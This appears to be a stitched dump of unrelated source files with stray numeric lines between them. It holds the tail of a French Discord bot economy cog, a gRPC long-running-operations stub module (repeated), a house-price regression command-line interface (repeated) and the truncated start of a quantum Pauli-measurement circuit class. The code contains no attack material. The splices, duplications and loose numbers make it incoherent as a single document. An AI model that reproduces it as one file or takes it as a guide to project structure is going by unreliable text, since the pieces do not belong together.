des bonus de présence sur les serveurs ayant activé l'option Renvoie le nouveau solde du membre s'il est modifié, sinon False""" if member.bot: raise UnauthorizedMember("Un bot ne peut pas toucher les bonus de présence") guild = member.guild conf = await self.config.guild(guild).all() if conf["presence_bonus"]: acc = await self.get_account(member) if acc.config["cache_presence_bonus"] + conf["presence_delay"] < time.time(): await self.config.member(member).config.set_raw("cache_presence_bonus", value=time.time()) return await self.deposit_credits(member, conf["presence_bonus"]) return False @commands.Cog.listener() async def on_message(self, message): if message.guild: if not message.author.bot: await self.manage_presence_bonus(message.author) @commands.Cog.listener() async def on_reaction_add(self, reaction, author): if reaction.message.guild: if not author.bot: await self.manage_presence_bonus(author) async def red_delete_data_for_user( self, *, requester: Literal["discord", "owner", "user", "user_strict"], user_id: int ): await self.config.user_from_id(user_id).clear() all_members = await self.config.all_members() async for guild_id, guild_data in AsyncIter(all_members.items(), steps=100): if user_id in guild_data: await self.config.member_from_ids(guild_id, user_id).clear()
0.655667
0.175009
"""gRPC client stubs and servicer scaffolding for ``google.longrunning.Operations``.

Generated-style code (grpc_tools output for ``operations.proto``).

NOTE(fix): the module references ``grpc.StatusCode``,
``grpc.unary_unary_rpc_method_handler`` and
``grpc.method_handlers_generic_handler`` but previously never imported
``grpc``, so every servicer method and ``add_OperationsServicer_to_server``
raised ``NameError`` at runtime.  ``import grpc`` has been added; everything
else is unchanged.
"""
import grpc

from google.longrunning.operations_pb2 import (
    CancelOperationRequest,
    DeleteOperationRequest,
    GetOperationRequest,
    ListOperationsRequest,
    ListOperationsResponse,
    Operation,
    google_dot_protobuf_dot_empty__pb2,
)
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities


class OperationsStub(object):
    """Manages long-running operations with an API service.

    When an API method normally takes long time to complete, it can be
    designed to return [Operation][google.longrunning.Operation] to the
    client, and the client can use this interface to receive the real
    response asynchronously by polling the operation resource, or using
    `google.watcher.v1.Watcher` interface to watch the response, or pass
    the operation resource to another API (such as Google Cloud Pub/Sub
    API) to receive the response.  Any API service that returns
    long-running operations should implement the `Operations` interface
    so developers can have a consistent client experience.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
          channel: A grpc.Channel.
        """
        self.GetOperation = channel.unary_unary(
            '/google.longrunning.Operations/GetOperation',
            request_serializer=GetOperationRequest.SerializeToString,
            response_deserializer=Operation.FromString,
        )
        self.ListOperations = channel.unary_unary(
            '/google.longrunning.Operations/ListOperations',
            request_serializer=ListOperationsRequest.SerializeToString,
            response_deserializer=ListOperationsResponse.FromString,
        )
        self.CancelOperation = channel.unary_unary(
            '/google.longrunning.Operations/CancelOperation',
            request_serializer=CancelOperationRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.DeleteOperation = channel.unary_unary(
            '/google.longrunning.Operations/DeleteOperation',
            request_serializer=DeleteOperationRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )


class OperationsServicer(object):
    """Service-side interface for ``google.longrunning.Operations``.

    Subclass and override the methods below, then register an instance
    with a server via :func:`add_OperationsServicer_to_server`.  Each
    default implementation reports UNIMPLEMENTED.
    """

    def GetOperation(self, request, context):
        """Gets the latest state of a long-running operation.

        Clients may use this method to poll the operation result at
        intervals as recommended by the API service.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListOperations(self, request, context):
        """Lists operations that match the specified filter in the request.

        If the server doesn't support this method, it returns
        `google.rpc.Code.UNIMPLEMENTED`.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def CancelOperation(self, request, context):
        """Starts asynchronous cancellation on a long-running operation.

        The server makes a best effort to cancel the operation, but
        success is not guaranteed.  If the server doesn't support this
        method, it returns `google.rpc.Code.UNIMPLEMENTED`.  Clients may
        use [Operations.GetOperation] or other methods to check whether
        the cancellation succeeded or the operation completed despite
        cancellation.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteOperation(self, request, context):
        """Deletes a long-running operation.

        It indicates the client is no longer interested in the operation
        result.  It does not cancel the operation.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_OperationsServicer_to_server(servicer, server):
    """Registers *servicer*'s four RPC handlers on *server*."""
    rpc_method_handlers = {
        'GetOperation': grpc.unary_unary_rpc_method_handler(
            servicer.GetOperation,
            request_deserializer=GetOperationRequest.FromString,
            response_serializer=Operation.SerializeToString,
        ),
        'ListOperations': grpc.unary_unary_rpc_method_handler(
            servicer.ListOperations,
            request_deserializer=ListOperationsRequest.FromString,
            response_serializer=ListOperationsResponse.SerializeToString,
        ),
        'CancelOperation': grpc.unary_unary_rpc_method_handler(
            servicer.CancelOperation,
            request_deserializer=CancelOperationRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
        'DeleteOperation': grpc.unary_unary_rpc_method_handler(
            servicer.DeleteOperation,
            request_deserializer=DeleteOperationRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'google.longrunning.Operations', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))


class BetaOperationsServicer(object):
    """Legacy ``grpc.beta`` service-side interface for Operations.

    Every method reports UNIMPLEMENTED until overridden.
    """

    def GetOperation(self, request, context):
        """Gets the latest state of a long-running operation."""
        context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)

    def ListOperations(self, request, context):
        """Lists operations that match the specified filter in the request."""
        context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)

    def CancelOperation(self, request, context):
        """Starts asynchronous cancellation on a long-running operation."""
        context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)

    def DeleteOperation(self, request, context):
        """Deletes a long-running operation."""
        context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)


class BetaOperationsStub(object):
    """Legacy ``grpc.beta`` client-side stub interface for Operations.

    Concrete stubs are produced by :func:`beta_create_Operations_stub`.
    """

    def GetOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None):
        """Gets the latest state of a long-running operation."""
        raise NotImplementedError()
    GetOperation.future = None

    def ListOperations(self, request, timeout, metadata=None, with_call=False, protocol_options=None):
        """Lists operations that match the specified filter in the request."""
        raise NotImplementedError()
    ListOperations.future = None

    def CancelOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None):
        """Starts asynchronous cancellation on a long-running operation."""
        raise NotImplementedError()
    CancelOperation.future = None

    def DeleteOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None):
        """Deletes a long-running operation."""
        raise NotImplementedError()
    DeleteOperation.future = None


def beta_create_Operations_server(servicer, pool=None, pool_size=None, default_timeout=None, maximum_timeout=None):
    """Builds a ``grpc.beta`` server wired to *servicer*'s methods."""
    request_deserializers = {
        ('google.longrunning.Operations', 'CancelOperation'): CancelOperationRequest.FromString,
        ('google.longrunning.Operations', 'DeleteOperation'): DeleteOperationRequest.FromString,
        ('google.longrunning.Operations', 'GetOperation'): GetOperationRequest.FromString,
        ('google.longrunning.Operations', 'ListOperations'): ListOperationsRequest.FromString,
    }
    response_serializers = {
        ('google.longrunning.Operations', 'CancelOperation'): google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ('google.longrunning.Operations', 'DeleteOperation'): google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ('google.longrunning.Operations', 'GetOperation'): Operation.SerializeToString,
        ('google.longrunning.Operations', 'ListOperations'): ListOperationsResponse.SerializeToString,
    }
    method_implementations = {
        ('google.longrunning.Operations', 'CancelOperation'): face_utilities.unary_unary_inline(servicer.CancelOperation),
        ('google.longrunning.Operations', 'DeleteOperation'): face_utilities.unary_unary_inline(servicer.DeleteOperation),
        ('google.longrunning.Operations', 'GetOperation'): face_utilities.unary_unary_inline(servicer.GetOperation),
        ('google.longrunning.Operations', 'ListOperations'): face_utilities.unary_unary_inline(servicer.ListOperations),
    }
    server_options = beta_implementations.server_options(
        request_deserializers=request_deserializers,
        response_serializers=response_serializers,
        thread_pool=pool,
        thread_pool_size=pool_size,
        default_timeout=default_timeout,
        maximum_timeout=maximum_timeout)
    return beta_implementations.server(method_implementations, options=server_options)


def beta_create_Operations_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):
    """Builds a ``grpc.beta`` dynamic stub for the Operations service."""
    request_serializers = {
        ('google.longrunning.Operations', 'CancelOperation'): CancelOperationRequest.SerializeToString,
        ('google.longrunning.Operations', 'DeleteOperation'): DeleteOperationRequest.SerializeToString,
        ('google.longrunning.Operations', 'GetOperation'): GetOperationRequest.SerializeToString,
        ('google.longrunning.Operations', 'ListOperations'): ListOperationsRequest.SerializeToString,
    }
    response_deserializers = {
        ('google.longrunning.Operations', 'CancelOperation'): google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        ('google.longrunning.Operations', 'DeleteOperation'): google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        ('google.longrunning.Operations', 'GetOperation'): Operation.FromString,
        ('google.longrunning.Operations', 'ListOperations'): ListOperationsResponse.FromString,
    }
    cardinalities = {
        'CancelOperation': cardinality.Cardinality.UNARY_UNARY,
        'DeleteOperation': cardinality.Cardinality.UNARY_UNARY,
        'GetOperation': cardinality.Cardinality.UNARY_UNARY,
        'ListOperations': cardinality.Cardinality.UNARY_UNARY,
    }
    stub_options = beta_implementations.stub_options(
        host=host,
        metadata_transformer=metadata_transformer,
        request_serializers=request_serializers,
        response_deserializers=response_deserializers,
        thread_pool=pool,
        thread_pool_size=pool_size)
    return beta_implementations.dynamic_stub(channel, 'google.longrunning.Operations', cardinalities, options=stub_options)
Janaagraha Bot/venv/Lib/site-packages/gcloud/bigtable/_generated_v2/operations_grpc_pb2.py
"""gRPC client stubs and servicer scaffolding for ``google.longrunning.Operations``.

Generated-style code (grpc_tools output for ``operations.proto``).

NOTE(fix): the module references ``grpc.StatusCode``,
``grpc.unary_unary_rpc_method_handler`` and
``grpc.method_handlers_generic_handler`` but previously never imported
``grpc``, so every servicer method and ``add_OperationsServicer_to_server``
raised ``NameError`` at runtime.  ``import grpc`` has been added; everything
else is unchanged.
"""
import grpc

from google.longrunning.operations_pb2 import (
    CancelOperationRequest,
    DeleteOperationRequest,
    GetOperationRequest,
    ListOperationsRequest,
    ListOperationsResponse,
    Operation,
    google_dot_protobuf_dot_empty__pb2,
)
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities


class OperationsStub(object):
    """Manages long-running operations with an API service.

    When an API method normally takes long time to complete, it can be
    designed to return [Operation][google.longrunning.Operation] to the
    client, and the client can use this interface to receive the real
    response asynchronously by polling the operation resource, or using
    `google.watcher.v1.Watcher` interface to watch the response, or pass
    the operation resource to another API (such as Google Cloud Pub/Sub
    API) to receive the response.  Any API service that returns
    long-running operations should implement the `Operations` interface
    so developers can have a consistent client experience.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
          channel: A grpc.Channel.
        """
        self.GetOperation = channel.unary_unary(
            '/google.longrunning.Operations/GetOperation',
            request_serializer=GetOperationRequest.SerializeToString,
            response_deserializer=Operation.FromString,
        )
        self.ListOperations = channel.unary_unary(
            '/google.longrunning.Operations/ListOperations',
            request_serializer=ListOperationsRequest.SerializeToString,
            response_deserializer=ListOperationsResponse.FromString,
        )
        self.CancelOperation = channel.unary_unary(
            '/google.longrunning.Operations/CancelOperation',
            request_serializer=CancelOperationRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.DeleteOperation = channel.unary_unary(
            '/google.longrunning.Operations/DeleteOperation',
            request_serializer=DeleteOperationRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )


class OperationsServicer(object):
    """Service-side interface for ``google.longrunning.Operations``.

    Subclass and override the methods below, then register an instance
    with a server via :func:`add_OperationsServicer_to_server`.  Each
    default implementation reports UNIMPLEMENTED.
    """

    def GetOperation(self, request, context):
        """Gets the latest state of a long-running operation.

        Clients may use this method to poll the operation result at
        intervals as recommended by the API service.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListOperations(self, request, context):
        """Lists operations that match the specified filter in the request.

        If the server doesn't support this method, it returns
        `google.rpc.Code.UNIMPLEMENTED`.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def CancelOperation(self, request, context):
        """Starts asynchronous cancellation on a long-running operation.

        The server makes a best effort to cancel the operation, but
        success is not guaranteed.  If the server doesn't support this
        method, it returns `google.rpc.Code.UNIMPLEMENTED`.  Clients may
        use [Operations.GetOperation] or other methods to check whether
        the cancellation succeeded or the operation completed despite
        cancellation.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteOperation(self, request, context):
        """Deletes a long-running operation.

        It indicates the client is no longer interested in the operation
        result.  It does not cancel the operation.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_OperationsServicer_to_server(servicer, server):
    """Registers *servicer*'s four RPC handlers on *server*."""
    rpc_method_handlers = {
        'GetOperation': grpc.unary_unary_rpc_method_handler(
            servicer.GetOperation,
            request_deserializer=GetOperationRequest.FromString,
            response_serializer=Operation.SerializeToString,
        ),
        'ListOperations': grpc.unary_unary_rpc_method_handler(
            servicer.ListOperations,
            request_deserializer=ListOperationsRequest.FromString,
            response_serializer=ListOperationsResponse.SerializeToString,
        ),
        'CancelOperation': grpc.unary_unary_rpc_method_handler(
            servicer.CancelOperation,
            request_deserializer=CancelOperationRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
        'DeleteOperation': grpc.unary_unary_rpc_method_handler(
            servicer.DeleteOperation,
            request_deserializer=DeleteOperationRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'google.longrunning.Operations', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))


class BetaOperationsServicer(object):
    """Legacy ``grpc.beta`` service-side interface for Operations.

    Every method reports UNIMPLEMENTED until overridden.
    """

    def GetOperation(self, request, context):
        """Gets the latest state of a long-running operation."""
        context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)

    def ListOperations(self, request, context):
        """Lists operations that match the specified filter in the request."""
        context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)

    def CancelOperation(self, request, context):
        """Starts asynchronous cancellation on a long-running operation."""
        context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)

    def DeleteOperation(self, request, context):
        """Deletes a long-running operation."""
        context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)


class BetaOperationsStub(object):
    """Legacy ``grpc.beta`` client-side stub interface for Operations.

    Concrete stubs are produced by :func:`beta_create_Operations_stub`.
    """

    def GetOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None):
        """Gets the latest state of a long-running operation."""
        raise NotImplementedError()
    GetOperation.future = None

    def ListOperations(self, request, timeout, metadata=None, with_call=False, protocol_options=None):
        """Lists operations that match the specified filter in the request."""
        raise NotImplementedError()
    ListOperations.future = None

    def CancelOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None):
        """Starts asynchronous cancellation on a long-running operation."""
        raise NotImplementedError()
    CancelOperation.future = None

    def DeleteOperation(self, request, timeout, metadata=None, with_call=False, protocol_options=None):
        """Deletes a long-running operation."""
        raise NotImplementedError()
    DeleteOperation.future = None


def beta_create_Operations_server(servicer, pool=None, pool_size=None, default_timeout=None, maximum_timeout=None):
    """Builds a ``grpc.beta`` server wired to *servicer*'s methods."""
    request_deserializers = {
        ('google.longrunning.Operations', 'CancelOperation'): CancelOperationRequest.FromString,
        ('google.longrunning.Operations', 'DeleteOperation'): DeleteOperationRequest.FromString,
        ('google.longrunning.Operations', 'GetOperation'): GetOperationRequest.FromString,
        ('google.longrunning.Operations', 'ListOperations'): ListOperationsRequest.FromString,
    }
    response_serializers = {
        ('google.longrunning.Operations', 'CancelOperation'): google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ('google.longrunning.Operations', 'DeleteOperation'): google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ('google.longrunning.Operations', 'GetOperation'): Operation.SerializeToString,
        ('google.longrunning.Operations', 'ListOperations'): ListOperationsResponse.SerializeToString,
    }
    method_implementations = {
        ('google.longrunning.Operations', 'CancelOperation'): face_utilities.unary_unary_inline(servicer.CancelOperation),
        ('google.longrunning.Operations', 'DeleteOperation'): face_utilities.unary_unary_inline(servicer.DeleteOperation),
        ('google.longrunning.Operations', 'GetOperation'): face_utilities.unary_unary_inline(servicer.GetOperation),
        ('google.longrunning.Operations', 'ListOperations'): face_utilities.unary_unary_inline(servicer.ListOperations),
    }
    server_options = beta_implementations.server_options(
        request_deserializers=request_deserializers,
        response_serializers=response_serializers,
        thread_pool=pool,
        thread_pool_size=pool_size,
        default_timeout=default_timeout,
        maximum_timeout=maximum_timeout)
    return beta_implementations.server(method_implementations, options=server_options)


def beta_create_Operations_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):
    """Builds a ``grpc.beta`` dynamic stub for the Operations service."""
    request_serializers = {
        ('google.longrunning.Operations', 'CancelOperation'): CancelOperationRequest.SerializeToString,
        ('google.longrunning.Operations', 'DeleteOperation'): DeleteOperationRequest.SerializeToString,
        ('google.longrunning.Operations', 'GetOperation'): GetOperationRequest.SerializeToString,
        ('google.longrunning.Operations', 'ListOperations'): ListOperationsRequest.SerializeToString,
    }
    response_deserializers = {
        ('google.longrunning.Operations', 'CancelOperation'): google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        ('google.longrunning.Operations', 'DeleteOperation'): google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        ('google.longrunning.Operations', 'GetOperation'): Operation.FromString,
        ('google.longrunning.Operations', 'ListOperations'): ListOperationsResponse.FromString,
    }
    cardinalities = {
        'CancelOperation': cardinality.Cardinality.UNARY_UNARY,
        'DeleteOperation': cardinality.Cardinality.UNARY_UNARY,
        'GetOperation': cardinality.Cardinality.UNARY_UNARY,
        'ListOperations': cardinality.Cardinality.UNARY_UNARY,
    }
    stub_options = beta_implementations.stub_options(
        host=host,
        metadata_transformer=metadata_transformer,
        request_serializers=request_serializers,
        response_deserializers=response_deserializers,
        thread_pool=pool,
        thread_pool_size=pool_size)
    return beta_implementations.dynamic_stub(channel, 'google.longrunning.Operations', cardinalities, options=stub_options)
0.731538
0.138928
import os
import sys
import subprocess
import pickle

import numpy

try:
    from distutils.util import strtobool
except ImportError:  # distutils was removed from the stdlib in Python 3.12
    def strtobool(val):
        """Drop-in replacement for distutils.util.strtobool."""
        val = val.lower()
        if val in ('y', 'yes', 't', 'true', 'on', '1'):
            return 1
        if val in ('n', 'no', 'f', 'false', 'off', '0'):
            return 0
        raise ValueError("invalid truth value %r" % (val,))


class userInterface():
    """Front-end for the house-price regression models.

    Collects the nine feature values (interactively or from a file),
    quantizes them via ``lib.Regression``, and predicts a price using the
    pre-computed per-city/per-region coefficients pickled under
    ``regression_output/.regressions``.
    """

    def __init__(self):
        # Feature titles, in the exact order the regression expects.
        self.inputTitle = ['縣市', '鄉鎮市區', '有無管理組織', '建物型態',
                           '土地移轉總面積平方公尺', '車位移轉總面積平方公尺',
                           '建物移轉總面積平方公尺', '建築完成年月', '交易年月']
        self.defaultPath = "regression_output"
        self.regressions = dict()    # {city: {region: coefficient vector}}
        self.inputVars = dict()      # raw user input keyed by feature title
        self.quantizedVars = dict()  # city/region plus the numeric feature vector
        # BUG FIX: predict()/getPredictedPrice() use ``predictedPrice``; the
        # original only initialized a misspelled ``predictPrice``, so calling
        # getPredictedPrice() before predict() raised AttributeError.
        self.predictedPrice = 0
        self.predictPrice = 0  # legacy misspelled attribute kept for compatibility
        self.readRegressions()

    def readRegressions(self, path=None):
        """Loads the pickled regressions, generating them first if absent.

        :param path: optional explicit pickle path; defaults to
                     ``<defaultPath>/.regressions``.
        """
        # BUG FIX: the original expression
        #   path = self.defaultPath + "/.regressions" if path is None else 0
        # replaced any caller-supplied path with the integer 0.
        if path is None:
            path = self.defaultPath + "/.regressions"
        if not os.path.isfile(path):
            print ("There is not regressions. Automatically generate.")
            cmd = ["python3", "regression_generator.py"]
            p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
            p.communicate()
            print ("Successfully generate!")
        # Context manager guarantees the handle is closed even if unpickling fails.
        with open(path, "rb") as f:
            self.regressions = pickle.load(f)

    def yesNoQuery(self, question):
        """Asks *question* until the user answers yes/no; returns 1 or 0."""
        print(question, end = "\t")
        while True:
            try:
                return strtobool(input().lower())
            except ValueError:
                # FIX: corrected typo "repond" in the user-facing prompt.
                print ("Please respond with y or n")

    def __isfloat(self, inStr):
        """True iff *inStr* parses as a float."""
        try:
            float(inStr)
            return True
        except ValueError:
            return False

    def __handleInputType(self, inStr):
        """Converts a raw input string to int or float when possible,
        otherwise returns it unchanged."""
        if inStr.isnumeric():
            inStr = int(inStr)
        elif self.__isfloat(inStr):
            inStr = float(inStr)
        return inStr

    def userInput(self):
        """Prompts interactively for every feature in ``inputTitle``."""
        for title in self.inputTitle:
            self.inputVars[title] = self.__handleInputType(input(title + ":"))

    def fileInput(self, path):
        """Reads one feature value per line from *path*; exits on bad input."""
        try:
            with open(path, "r") as f:
                for line, title in zip(f.read().splitlines(), self.inputTitle):
                    self.inputVars[title] = self.__handleInputType(line)
            # zip() stops at the shorter sequence, so a short file leaves
            # inputVars incomplete — detect and bail out.
            if len(self.inputVars) != len(self.inputTitle):
                print ("Your input file contains wrong parameter numbers!!!")
                sys.exit(0)
        except FileNotFoundError:
            print ("Your input file does not exist!!!")
            sys.exit(0)

    def quantize(self):
        """Quantizes ``inputVars`` into a numeric vector; returns self for chaining."""
        # Imported lazily: only quantize() needs the project package, so the
        # module itself stays importable (and unit-testable) without it.
        from lib.Regression import Regression
        city = self.inputVars['縣市'][:3]  # first three chars identify the city
        region = self.inputVars['鄉鎮市區']
        reg = Regression()
        self.quantizedVars['縣市'] = city
        self.quantizedVars['鄉鎮市區'] = region
        self.quantizedVars['variables'] = numpy.array(reg.quantizeForRec(self.inputVars, city))
        return self

    def predict(self):
        """Computes predictedPrice = variables · coefficients for the chosen region."""
        city = self.quantizedVars['縣市']
        region = self.quantizedVars['鄉鎮市區']
        coefficient = self.regressions[city][region]
        self.predictedPrice = numpy.dot(self.quantizedVars["variables"], coefficient)

    def getPredictedPrice(self):
        """Returns the most recent prediction (0 before predict() has run)."""
        return self.predictedPrice

    def printReport(self):
        """Prints the most specific report file available for the city/region."""
        path = self.defaultPath + "/report/"
        city = self.quantizedVars["縣市"]
        region = self.quantizedVars["鄉鎮市區"]
        print("city : ", city)
        print("region : ", region)
        if os.path.exists(path + city):
            path += city + "/"
            if os.path.exists(path + region):
                path += region + "/" + region + ".txt"
            else:
                path += city + ".txt"
        else:
            path += "total.txt"
        with open(path) as f:
            print (f.read())
lib/userInterface.py
import os
import sys
import subprocess
import pickle

import numpy

try:
    from distutils.util import strtobool
except ImportError:  # distutils was removed from the stdlib in Python 3.12
    def strtobool(val):
        """Drop-in replacement for distutils.util.strtobool."""
        val = val.lower()
        if val in ('y', 'yes', 't', 'true', 'on', '1'):
            return 1
        if val in ('n', 'no', 'f', 'false', 'off', '0'):
            return 0
        raise ValueError("invalid truth value %r" % (val,))


class userInterface():
    """Front-end for the house-price regression models.

    Collects the nine feature values (interactively or from a file),
    quantizes them via ``lib.Regression``, and predicts a price using the
    pre-computed per-city/per-region coefficients pickled under
    ``regression_output/.regressions``.
    """

    def __init__(self):
        # Feature titles, in the exact order the regression expects.
        self.inputTitle = ['縣市', '鄉鎮市區', '有無管理組織', '建物型態',
                           '土地移轉總面積平方公尺', '車位移轉總面積平方公尺',
                           '建物移轉總面積平方公尺', '建築完成年月', '交易年月']
        self.defaultPath = "regression_output"
        self.regressions = dict()    # {city: {region: coefficient vector}}
        self.inputVars = dict()      # raw user input keyed by feature title
        self.quantizedVars = dict()  # city/region plus the numeric feature vector
        # BUG FIX: predict()/getPredictedPrice() use ``predictedPrice``; the
        # original only initialized a misspelled ``predictPrice``, so calling
        # getPredictedPrice() before predict() raised AttributeError.
        self.predictedPrice = 0
        self.predictPrice = 0  # legacy misspelled attribute kept for compatibility
        self.readRegressions()

    def readRegressions(self, path=None):
        """Loads the pickled regressions, generating them first if absent.

        :param path: optional explicit pickle path; defaults to
                     ``<defaultPath>/.regressions``.
        """
        # BUG FIX: the original expression
        #   path = self.defaultPath + "/.regressions" if path is None else 0
        # replaced any caller-supplied path with the integer 0.
        if path is None:
            path = self.defaultPath + "/.regressions"
        if not os.path.isfile(path):
            print ("There is not regressions. Automatically generate.")
            cmd = ["python3", "regression_generator.py"]
            p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
            p.communicate()
            print ("Successfully generate!")
        # Context manager guarantees the handle is closed even if unpickling fails.
        with open(path, "rb") as f:
            self.regressions = pickle.load(f)

    def yesNoQuery(self, question):
        """Asks *question* until the user answers yes/no; returns 1 or 0."""
        print(question, end = "\t")
        while True:
            try:
                return strtobool(input().lower())
            except ValueError:
                # FIX: corrected typo "repond" in the user-facing prompt.
                print ("Please respond with y or n")

    def __isfloat(self, inStr):
        """True iff *inStr* parses as a float."""
        try:
            float(inStr)
            return True
        except ValueError:
            return False

    def __handleInputType(self, inStr):
        """Converts a raw input string to int or float when possible,
        otherwise returns it unchanged."""
        if inStr.isnumeric():
            inStr = int(inStr)
        elif self.__isfloat(inStr):
            inStr = float(inStr)
        return inStr

    def userInput(self):
        """Prompts interactively for every feature in ``inputTitle``."""
        for title in self.inputTitle:
            self.inputVars[title] = self.__handleInputType(input(title + ":"))

    def fileInput(self, path):
        """Reads one feature value per line from *path*; exits on bad input."""
        try:
            with open(path, "r") as f:
                for line, title in zip(f.read().splitlines(), self.inputTitle):
                    self.inputVars[title] = self.__handleInputType(line)
            # zip() stops at the shorter sequence, so a short file leaves
            # inputVars incomplete — detect and bail out.
            if len(self.inputVars) != len(self.inputTitle):
                print ("Your input file contains wrong parameter numbers!!!")
                sys.exit(0)
        except FileNotFoundError:
            print ("Your input file does not exist!!!")
            sys.exit(0)

    def quantize(self):
        """Quantizes ``inputVars`` into a numeric vector; returns self for chaining."""
        # Imported lazily: only quantize() needs the project package, so the
        # module itself stays importable (and unit-testable) without it.
        from lib.Regression import Regression
        city = self.inputVars['縣市'][:3]  # first three chars identify the city
        region = self.inputVars['鄉鎮市區']
        reg = Regression()
        self.quantizedVars['縣市'] = city
        self.quantizedVars['鄉鎮市區'] = region
        self.quantizedVars['variables'] = numpy.array(reg.quantizeForRec(self.inputVars, city))
        return self

    def predict(self):
        """Computes predictedPrice = variables · coefficients for the chosen region."""
        city = self.quantizedVars['縣市']
        region = self.quantizedVars['鄉鎮市區']
        coefficient = self.regressions[city][region]
        self.predictedPrice = numpy.dot(self.quantizedVars["variables"], coefficient)

    def getPredictedPrice(self):
        """Returns the most recent prediction (0 before predict() has run)."""
        return self.predictedPrice

    def printReport(self):
        """Prints the most specific report file available for the city/region."""
        path = self.defaultPath + "/report/"
        city = self.quantizedVars["縣市"]
        region = self.quantizedVars["鄉鎮市區"]
        print("city : ", city)
        print("region : ", region)
        if os.path.exists(path + city):
            path += city + "/"
            if os.path.exists(path + region):
                path += region + "/" + region + ".txt"
            else:
                path += city + ".txt"
        else:
            path += "total.txt"
        with open(path) as f:
            print (f.read())
0.147832
0.171876
from typing import Dict, List
from copy import deepcopy
import itertools
import numpy as np
from QCompute.QPlatform.QEnv import QEnv
from QCompute.QPlatform.QRegPool import QRegPool
from QCompute.QPlatform.QOperation.RotationGate import RX, RY
from QCompute.QPlatform.QOperation.FixedGate import H, S, CX
from QCompute.QPlatform.QOperation.Measure import MeasureZ
from qapp.utils import grouping_hamiltonian
from .basic_circuit import BasicCircuit


class PauliMeasurementCircuit(BasicCircuit):
    """Pauli Measurement Circuit class"""

    def __init__(self, num: int, pauli_terms: List):
        """The constructor of the PauliMeasurementCircuit class

        :param num: Number of qubits
        :param pauli_terms: Pauli terms to be measured, as a list of
            (coefficient, pauli string) pairs
        """
        super().__init__(num)
        # FIX: the annotation said `str`, but the loops below unpack
        # (coefficient, pauli string) pairs from this sequence.
        self._pauli_terms = deepcopy(pauli_terms)

    def add_circuit(self, q: QRegPool, pauli_str: str):
        """Adds the pauli measurement circuit to the register

        :param q: Quantum register to which this circuit is added
        :param pauli_str: Pauli string to be measured (lower case)
        """
        for i in range(self._num):
            # Rotate so a Z-basis measurement reads out X / Y eigenvalues.
            if pauli_str[i] == 'x':
                RY(-np.pi / 2)(q[i])
            elif pauli_str[i] == 'y':
                RX(np.pi / 2)(q[i])
        # Measure all qubits
        MeasureZ(q, list(range(len(q))))

    def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float:
        """Computes the expectation value of the Pauli terms

